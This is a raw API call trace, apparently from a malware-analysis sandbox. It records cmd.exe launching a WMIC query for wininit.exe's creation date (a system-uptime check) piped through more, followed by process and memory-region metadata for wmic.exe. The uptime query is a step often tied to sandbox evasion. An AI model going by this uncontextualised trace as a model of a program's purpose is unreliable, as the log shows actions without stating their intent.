[0400.031] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM" (normalized: "c:\\windows\\system32\\wbem\\wmic.com"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.031] GetLastError () returned 0x2
[0400.031] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0x3ca3f0
[0400.031] GetProcessHeap () returned 0x3b0000
[0400.031] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c47e0, Size=0x8) returned 0x3ca450
[0400.031] FindClose (in: hFindFile=0x3ca3f0 | out: hFindFile=0x3ca3f0) returned 1
[0400.031] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0400.031] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0400.032] GetProcessHeap () returned 0x3b0000
[0400.032] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x28) returned 0x3c47e0
[0400.032] GetProcessHeap () returned 0x3b0000
[0400.032] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x218) returned 0x3cf300
[0400.032] GetProcessHeap () returned 0x3b0000
[0400.032] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x82) returned 0x3cf520
[0400.032] SetErrorMode (uMode=0x0) returned 0x0
[0400.032] SetErrorMode (uMode=0x1) returned 0x0
[0400.033] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3cf5c0, lpFilePart=0x22f560 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x22f560*="system32") returned 0x13
[0400.033] SetErrorMode (uMode=0x0) returned 0x1
[0400.033] GetProcessHeap () returned 0x3b0000
[0400.033] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3cf5b0, Size=0x42) returned 0x3cf5b0
[0400.033] GetProcessHeap () returned 0x3b0000
[0400.033] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3cf5b0) returned 0x42
[0400.033] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0400.033] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0400.033] GetProcessHeap () returned 0x3b0000
[0400.033] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1ce) returned 0x3cf610
[0400.033] GetProcessHeap () returned 0x3b0000
[0400.033] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x38c) returned 0x3cf7f0
[0400.034] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3cf7f0, Size=0x1d0) returned 0x3cf7f0
[0400.034] GetProcessHeap () returned 0x3b0000
[0400.034] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3cf7f0) returned 0x1d0
[0400.034] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0400.034] GetProcessHeap () returned 0x3b0000
[0400.034] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe8) returned 0x3cf9d0
[0400.034] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3cf9d0, Size=0x7e) returned 0x3cf9d0
[0400.034] GetProcessHeap () returned 0x3b0000
[0400.034] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3cf9d0) returned 0x7e
[0400.034] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.034] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.035] GetLastError () returned 0x2
[0400.035] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.035] GetLastError () returned 0x2
[0400.035] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.035] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\WMIC.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.036] GetLastError () returned 0x2
[0400.036] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\WMIC" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.036] GetLastError () returned 0x2
[0400.036] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.036] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.037] GetLastError () returned 0x2
[0400.037] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.037] GetLastError () returned 0x2
[0400.037] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.037] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*" (normalized: "c:\\windows\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.038] GetLastError () returned 0x2
[0400.038] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC" (normalized: "c:\\windows\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.038] GetLastError () returned 0x2
[0400.038] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.038] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*" (normalized: "c:\\windows\\system32\\wbem\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0x3ca3f0
[0400.038] FindClose (in: hFindFile=0x3ca3f0 | out: hFindFile=0x3ca3f0) returned 1
[0400.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM" (normalized: "c:\\windows\\system32\\wbem\\wmic.com"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.039] GetLastError () returned 0x2
[0400.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0x3ca3f0
[0400.039] FindClose (in: hFindFile=0x3ca3f0 | out: hFindFile=0x3ca3f0) returned 1
[0400.039] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0400.039] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0400.039] GetConsoleTitleW (in: lpConsoleTitle=0x22f820, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0400.040] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f5d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f598 | out: lpAttributeList=0x22f5d8, lpSize=0x22f598) returned 1
[0400.040] UpdateProcThreadAttribute (in: lpAttributeList=0x22f5d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f588, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f5d8, lpPreviousValue=0x0) returned 1
[0400.040] GetStartupInfoW (in: lpStartupInfo=0x22f6f0 | out: lpStartupInfo=0x22f6f0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0400.040] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1
[0400.043] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC PROCESS where name=\"wininit.exe\" get creationdate ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x22f610*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="WMIC PROCESS where name=\"wininit.exe\" get creationdate ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f5c0 | out: lpCommandLine="WMIC PROCESS where name=\"wininit.exe\" get creationdate ", lpProcessInformation=0x22f5c0*(hProcess=0x64, hThread=0x5c, dwProcessId=0xdec, dwThreadId=0xdf0)) returned 1
[0400.052] CloseHandle (hObject=0x5c) returned 1
[0400.052] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0400.053] GetProcessHeap () returned 0x3b0000
[0400.053] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c8fb0 | out: hHeap=0x3b0000) returned 1
[0400.053] GetEnvironmentStringsW () returned 0x3c8fb0*
[0400.053] GetProcessHeap () returned 0x3b0000
[0400.053] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb78) returned 0x3cfe40
[0400.053] memcpy (in: _Dst=0x3cfe40, _Src=0x3c8fb0, _Size=0xb78 | out: _Dst=0x3cfe40) returned 0x3cfe40
[0400.053] FreeEnvironmentStringsW (penv=0x3c8fb0) returned 1
[0400.053] GetProcessHeap () returned 0x3b0000
[0400.053] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3ca470 | out: hHeap=0x3b0000) returned 1
[0400.053] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f5d8 | out: lpAttributeList=0x22f5d8)
[0400.053] _get_osfhandle (_FileHandle=3) returned 0x58
[0400.053] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x58, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1
[0400.053] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0
[0400.054] _close (_FileHandle=5) returned 0
[0400.055] _dup (_FileHandle=0) returned 4
[0400.056] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0
[0400.057] _close (_FileHandle=3) returned 0
[0400.058] SetErrorMode (uMode=0x0) returned 0x0
[0400.059] SetErrorMode (uMode=0x1) returned 0x0
[0400.059] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3c8fc0, lpFilePart=0x22f7d0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x22f7d0*="system32") returned 0x13
[0400.059] SetErrorMode (uMode=0x0) returned 0x1
[0400.059] GetProcessHeap () returned 0x3b0000
[0400.059] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c8fb0, Size=0x42) returned 0x3c8fb0
[0400.059] GetProcessHeap () returned 0x3b0000
[0400.059] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c8fb0) returned 0x42
[0400.059] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0400.059] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0400.060] GetProcessHeap () returned 0x3b0000
[0400.060] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1ce) returned 0x3c5ea0
[0400.060] GetProcessHeap () returned 0x3b0000
[0400.060] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x38c) returned 0x3c9010
[0400.060] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c9010, Size=0x1d0) returned 0x3c9010
[0400.060] GetProcessHeap () returned 0x3b0000
[0400.060] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c9010) returned 0x1d0
[0400.060] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0400.060] GetProcessHeap () returned 0x3b0000
[0400.060] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe8) returned 0x3c91f0
[0400.060] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c91f0, Size=0x7e) returned 0x3c91f0
[0400.060] GetProcessHeap () returned 0x3b0000
[0400.060] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c91f0) returned 0x7e
[0400.061] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.061] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\more.*" (normalized: "c:\\windows\\system32\\more.*"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0x3c6080
[0400.061] FindClose (in: hFindFile=0x3c6080 | out: hFindFile=0x3c6080) returned 1
[0400.061] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\more.COM" (normalized: "c:\\windows\\system32\\more.com"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0x3c6080
[0400.062] FindClose (in: hFindFile=0x3c6080 | out: hFindFile=0x3c6080) returned 1
[0400.062] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1
[0400.062] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2
[0400.062] _get_osfhandle (_FileHandle=1) returned 0x7
[0400.062] _get_osfhandle (_FileHandle=1) returned 0x7
[0400.062] _get_osfhandle (_FileHandle=1) returned 0x7
[0400.062] GetFileType (hFile=0x7) returned 0x2
[0400.063] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0400.063] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f7e8 | out: lpMode=0x22f7e8) returned 1
[0400.064] _dup (_FileHandle=1) returned 3
[0400.105] _close (_FileHandle=1) returned 0
[0400.106] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", _String2="con") returned -53
[0400.106] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22f798, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58
[0400.109] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 1
[0400.109] GetProcessHeap () returned 0x3b0000
[0400.109] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x218) returned 0x3c9280
[0400.110] GetProcessHeap () returned 0x3b0000
[0400.110] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1e) returned 0x3c4870
[0400.110] SetErrorMode (uMode=0x0) returned 0x0
[0400.110] SetErrorMode (uMode=0x1) returned 0x0
[0400.110] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3c94b0, lpFilePart=0x22f560 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x22f560*="system32") returned 0x13
[0400.110] SetErrorMode (uMode=0x0) returned 0x1
[0400.110] GetProcessHeap () returned 0x3b0000
[0400.110] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c94a0, Size=0x42) returned 0x3c94a0
[0400.110] GetProcessHeap () returned 0x3b0000
[0400.111] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c94a0) returned 0x42
[0400.111] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0400.111] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0400.111] GetProcessHeap () returned 0x3b0000
[0400.111] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1ce) returned 0x3c9500
[0400.111] GetProcessHeap () returned 0x3b0000
[0400.111] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x38c) returned 0x3c96e0
[0400.111] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c96e0, Size=0x1d0) returned 0x3c96e0
[0400.111] GetProcessHeap () returned 0x3b0000
[0400.111] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c96e0) returned 0x1d0
[0400.111] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0400.111] GetProcessHeap () returned 0x3b0000
[0400.111] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe8) returned 0x3c98c0
[0400.112] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c98c0, Size=0x7e) returned 0x3c98c0
[0400.112] GetProcessHeap () returned 0x3b0000
[0400.112] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c98c0) returned 0x7e
[0400.112] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.112] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\more.*" (normalized: "c:\\windows\\system32\\more.*"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0x3c6080
[0400.112] FindClose (in: hFindFile=0x3c6080 | out: hFindFile=0x3c6080) returned 1
[0400.112] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\more.COM" (normalized: "c:\\windows\\system32\\more.com"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0x3c6080
[0400.113] FindClose (in: hFindFile=0x3c6080 | out: hFindFile=0x3c6080) returned 1
[0400.113] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1
[0400.113] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2
[0400.113] GetConsoleTitleW (in: lpConsoleTitle=0x22f820, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0400.113] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f5d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f598 | out: lpAttributeList=0x22f5d8, lpSize=0x22f598) returned 1
[0400.113] UpdateProcThreadAttribute (in: lpAttributeList=0x22f5d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f588, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f5d8, lpPreviousValue=0x0) returned 1
[0400.113] GetStartupInfoW (in: lpStartupInfo=0x22f6f0 | out: lpStartupInfo=0x22f6f0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0400.114] lstrcmpW (lpString1="\\more.com", lpString2="\\XCOPY.EXE") returned -1
[0400.114] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\more.com", lpCommandLine="more ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x22f610*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="more ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f5c0 | out: lpCommandLine="more ", lpProcessInformation=0x22f5c0*(hProcess=0x6c, hThread=0x5c, dwProcessId=0xde8, dwThreadId=0xd4c)) returned 1
[0400.135] CloseHandle (hObject=0x5c) returned 1
[0400.136] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0400.136] GetProcessHeap () returned 0x3b0000
[0400.136] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cfe40 | out: hHeap=0x3b0000) returned 1
[0400.136] GetEnvironmentStringsW () returned 0x3cfe40*
[0400.136] GetProcessHeap () returned 0x3b0000
[0400.136] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb78) returned 0x3d49e0
[0400.136] memcpy (in: _Dst=0x3d49e0, _Src=0x3cfe40, _Size=0xb78 | out: _Dst=0x3d49e0) returned 0x3d49e0
[0400.136] FreeEnvironmentStringsW (penv=0x3cfe40) returned 1
[0400.139] GetProcessHeap () returned 0x3b0000
[0400.139] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3ca470 | out: hHeap=0x3b0000) returned 1
[0400.139] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f5d8 | out: lpAttributeList=0x22f5d8)
[0400.139] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0400.141] _close (_FileHandle=3) returned 0
[0400.142] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0
[0400.143] _close (_FileHandle=4) returned 0
[0400.144] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0
[0407.533] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x22faf8 | out: lpExitCode=0x22faf8*=0x0) returned 1
[0407.533] CloseHandle (hObject=0x64) returned 1
[0407.534] WaitForSingleObject (hHandle=0x6c, dwMilliseconds=0xffffffff) returned 0x0
[0407.534] GetExitCodeProcess (in: hProcess=0x6c, lpExitCode=0x22faf8 | out: lpExitCode=0x22faf8*=0x0) returned 1
[0407.534] CloseHandle (hObject=0x6c) returned 1
[0407.534] _get_osfhandle (_FileHandle=1) returned 0x7
[0407.534] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0407.535] _get_osfhandle (_FileHandle=1) returned 0x7
[0407.535] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a65e194 | out: lpMode=0x4a65e194) returned 1
[0407.536] _get_osfhandle (_FileHandle=0) returned 0x3
[0407.536] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a65e198 | out: lpMode=0x4a65e198) returned 1
[0407.537] SetConsoleInputExeNameW () returned 0x1
[0407.537] GetConsoleOutputCP () returned 0x1b5
[0407.537] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a66bfe0 | out: lpCPInfo=0x4a66bfe0) returned 1
[0407.537] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0407.539] exit (_Code=0)
Process:
id = "19"
image_name = "wmic.exe"
filename = "c:\\windows\\system32\\wbem\\wmic.exe"
page_root = "0x25654000"
os_pid = "0xdec"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "18"
os_parent_pid = "0xdd4"
cmd_line = "WMIC PROCESS where name=\"wininit.exe\" get creationdate "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2423
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2424
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2425
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2426
start_va = 0xf0000
end_va = 0x16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2427
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2428
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2429
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2430
start_va = 0xffa30000
end_va = 0xffabcfff
monitored = 1
entry_point = 0xffa7cc30
region_type = mapped_file
name = "wmic.exe"
filename = "\\Windows\\System32\\wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")
Region:
id = 2431
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2432
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2433
start_va = 0x7fffffdd000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 2434
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2435
start_va = 0x170000
end_va = 0x33ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 2436
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2437
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2438
start_va = 0x10000
